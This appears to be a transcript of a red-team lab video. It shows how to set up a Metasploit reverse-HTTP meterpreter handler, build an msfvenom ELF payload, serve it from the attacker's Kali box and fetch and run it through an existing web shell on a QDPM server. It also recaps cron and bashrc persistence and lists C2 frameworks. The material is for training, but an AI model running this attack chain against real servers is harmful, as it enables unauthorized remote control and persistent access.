Welcome back to this video on the orange attack path. This is the last set of techniques that we'll be executing. This group is about HTTP Exfil, which is the miscreants or your red team. After you compromise a server, you establish a method of command and control from the box that you compromised using the protocol HTTP. Granted, it's not encrypted, but you may have to execute this step to help the blue team identify if they can detect an HTTP tunnel and look at the traffic inside of that tunnel to see what you're doing on the red team. From the previous techniques, we looked at cron tab and how it's used and the different methods of using it. We also created a cron tab that would build a web shell in the event our initial web shell under uploads users was removed. This cron tab would execute and then add another web shell to users attachments so that we could get another foothold. The third item is we added to the bashrc file bash commands that would add our SSH key back to the authorized keys file if it had been removed. So for this section, we're going to create that HTTP tunnel so that we can remotely control the web server through the Vagrant account. So first of all, we need to set up what's called a multi-handler in Metasploit. To do that, launch the Postgres database. First, it is important that you have the Postgres database running. You can execute Metasploit without it, but the handling of the HTTP interpreter session is better if you have the Postgres database running. So launch Metasploit, type in use exploit / multi-handler as it displays here. And go ahead and show options, so show space options. It'll list a screen similar to this, and your payload may be different. So the first thing we need to do is set our payload. So set payload, Linux / x64 interpreter reverse HTTP. Notice that this is for 64-bit Linux. If we had a 32-bit Windows server, we'd have to change that to an x86 interpreter reverse HTTP. And then it shows the local host and local port. The local host is referring to your IP. So on Kali, you may have multiple interfaces, and if you're connected through a VPN, you may have one additional interface. If the VPN's interface is what is closest to the web server, you need to list the lhost IP as the VPN's interface. So you do set needs to be lowercase, set lhost and the IP address on the Kali box that is listening. And then you do set lport, which is again the port on your Kali box that will listen for that connection to come from the web server. And then for the final command, you'll do exploit -j, which runs the exploit multi-handler, sets up the interface, sets up the listening on the port for a interpreter reverse HTTP, and the -j executes it as a job in the background. The next thing you want to do is build the payload. The payload is what we're going to deliver to the web server to be executed. So we're going to use MSF Venom with the payload that matches what our multi-handler is listening for. So Linux x64, interpreter reverse HTTP, and the same information that we built our listener on. And if you specify the platform Linux, it will not error out on you. And then we want an elf file, which is a binary file for Linux. And we're going to call the file shell x64.elf. And I've kind of gone into some additional information. I would encourage you to do man MSF Venom because there are additional parameters that you can set at the command line. For example, you can set the bad characters that you do not want to appear in your ELF file. You can set how you want it encoded and various items to help hide the ELF file that is created. Granted, most of your AVs will detect this, but you never know. You have to test first to find out. Then we need to somehow figure out how to deliver that payload to our web server. So on the web server, the QDPM web server, we already have a web shell. So we can utilize that web shell to download from our Kali box the ELF file that we just created. So on Kali, where you created that ELF file, in the same directory run python 3 m http.server 8080. What this does is it spins up a simple HTTP server using Python to host those files on port 8080. And you can change the port. Say port 8080 is on the web server, or you already have port 8080 listening, you can change it to 9,000, 10,000, whatever you need to. Just remember, as a red team, you do want it to somewhat hide from the blue team. So think about that as you're deciding which port to use. Sometimes if the port is less than 1024, you need escalated privileges to be able to execute the Python 3 command. And then from the web server, you can do the command equals wget http the website, which would be the IP address of Kali, :8080/shell x64 elf, minus capital O for this is where I want to output the file to, var www html uploads users m.elf. And I simplified the name just because. And then the next command is chmod 700 var www html uploads users m.elf. Chmod 7.0 is giving read write execute to the www user on the m.elf file that I just placed on the server. And then if I do command equals m.elf and the ampersand sign, the ampersand sign executes it and runs it in the background so that it frees up the command equals in the website sometimes. This will download the payload, make it executable, and then execute it. Upon execution, in Metasploit, you should see a session that is created. And you may have to hit enter a couple of times, and then you can type sessions -L, and it will list that, hey, I have an interpreter session on the box or the web server. I'm using my Kali computer at the moment, but here it would list QDPM and the host name or vagrant@QDPM. And if I want to interact with this session, I can do sessions -I and the session ID. And then if you type help with Meterpreter, you can see all the commands that can execute. You can also drop to a shell if you need to. Another thing is if you're in Meterpreter or you've dropped to a shell, if you need to back up without losing that connection, you can hit Control-Z. And you can say, yes, I want to background this. And if you're in Meterpreter, you can do the same thing. You can hit Control-Z, and it says, do you want to background this? And you say yes, and you're back to the Metasploit framework where you can select other auxiliary modules that can be executed on the session that you have, as long as your session doesn't die. So real quick, Metasploit is a great framework, but it's not necessarily built for persistence. It could be, and it's definitely used that way, but you may want to explore other frameworks, for example, Covenant or Empire, for your engagements, because you may be emulating an adversary that uses Covenant or C# framework or Empire or something else like Cobalt Strike. So there's this website, at https://www.thec2matrix.com. I'm going to go out there really quick. When you go to the website, this is what it looks like. If you click Ask the Matrix, it will walk you through some simple questions. Do you need the C2 that supports multiple users? Let's say yes. What channels do you need to call back on? So I'm using HTTP now, but maybe I want to use ICMP. And it narrows down the C2s that are available for me to use. So the C2, if I wanted to do ICMP, would be innuendo. If ICMP was not a requirement of mine and SMB was, I could switch, and now I can see that Cobalt Strike, Innuendo, Metasploit, and Scythe would be options for me as a C2 that I could learn and use to emulate a given adversary. So that is all for this video, and that will complete the orange attack path. If you have any questions, please reach out. Thanks. Bye.